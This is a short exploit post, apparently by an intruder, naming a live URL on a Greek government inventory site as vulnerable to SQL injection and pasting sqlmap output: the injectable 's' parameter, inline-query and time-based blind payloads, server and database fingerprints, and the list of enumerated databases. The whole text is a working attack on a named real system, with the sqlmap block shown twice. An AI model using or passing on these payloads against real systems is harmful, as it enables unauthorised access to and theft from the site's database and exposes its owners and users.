# Tested On : Kali Linux
# Contact : instagram.com/rootayyildiz/
Vlun : https://einventory.e-gif.gov.gr/export_to_json.php?s=test
sqlmap identified the following injection point(s) with a total of 434 HTTP(s) requests:
---
Parameter: s (GET)
Type: inline query
Title: Generic inline queries
Payload: s=(SELECT CONCAT(CONCAT(0x7176707671,(CASE WHEN (3241=3241) THEN 0x31 ELSE 0x30 END)),0x71786a7071))
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: s=(SELECT 2051 FROM (SELECT(SLEEP(5)))iIrq)
---
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: s (GET)
Type: inline query
Title: Generic inline queries
Payload: s=(SELECT CONCAT(CONCAT(0x7176707671,(CASE WHEN (3241=3241) THEN 0x31 ELSE 0x30 END)),0x71786a7071))
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: s=(SELECT 2051 FROM (SELECT(SLEEP(5)))iIrq)
---
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.0
available databases [2]:
[*] db_einv
[*] information_schema